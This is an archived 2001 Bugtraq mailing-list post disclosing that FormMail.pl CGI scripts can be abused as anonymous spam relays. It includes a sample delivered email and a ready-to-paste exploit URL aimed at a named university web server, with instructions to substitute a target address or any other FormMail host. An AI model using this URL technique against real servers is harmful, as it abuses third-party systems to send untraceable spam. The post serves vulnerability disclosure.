Bugtraq: CORRECTION to CODE: FormMail.pl can be used to send anonymous email

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

CORRECTION to CODE: FormMail.pl can be used to send anonymous email

From: Michael Rawls <bugtraq () SHADOWSTORM COM>
Date: Sat, 10 Mar 2001 17:43:43 +0000

Hi All,
   I did a little playing with FormMail.pl after a run in with a spammer
abusing our webserver. Apparently ALL FormMail.pl cgi-bin scripts can be
used to spam anonymously.  I found another server with FormMail.pl and
tried the same exploit to send myself an email and it worked.

The email will not show the spammer's real IP.  Only the web servers IP
will show.  The web server logs will however show the true IP address of
the spammer.


===========
Actual example of email sent;
============
Return-Path: <apache () hum auc dk>
Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
        by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
        for <spam-l () shadowstorm com>; Sat, 10 Mar 2001 17:19:34 -0700
Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
        id 14bta3-0004tP-00
        for spam-l () shadowstorm com; Sun, 11 Mar 2001 01:19:27 +0100
To: spam-l () shadowstorm com
From: ()
Subject: WWW Form Submission
Message-Id: <E14bta3-0004tP-00 () hercules humfak auc dk>
Date: Sun, 11 Mar 2001 01:19:27 +0100
X-UIDL: TPj"!bg3"!i:T!!=FU"!

Below is the result of your feedback form.  It was submitted by
() on Sunday, March 11, 2001 at 01:19:27
---------------------------------------------------------------------------

message: Proof that FormMail.pl can be used to send anonymous spam.

---------------------------------------------------------------------------


Paste the line below in to your web browser URL box as one long single
line, insert your email in address in place of "email () address-to-spam com",
and press enter.  Now go check your email.

Begin URL code
================
http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=email () address-to-spam co
m&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymo
us%20spam.
================

If this technique was not already in use by a spammer I would have kept it
to myself, but it has already been on my server by a spammer.

The address "www.hum.auc.dk" can be replaced with the address of ANY
webserver set up to use FormMail.pl

-M. Rawls

By Date By Thread

Current thread:

CORRECTION to CODE: FormMail.pl can be used to send anonymous email Michael Rawls (Mar 11)
- Re: CORRECTION to CODE: FormMail.pl can be used to send anonymous email Palmans Pepijn (Mar 12)
  - Re: CORRECTION to CODE: FormMail.pl can be used to send anonymous email Peter W (Mar 12)
- Re: CORRECTION to CODE: FormMail.pl can be used to send anonymous email Joel Sing (Mar 12)
  - Re: CORRECTION to CODE: FormMail.pl can be used to send anonymous email Steffen Dettmer (Mar 12)
  - Re: CORRECTION to CODE: FormMail.pl can be used to send anonymous email Steve Reid (Mar 13)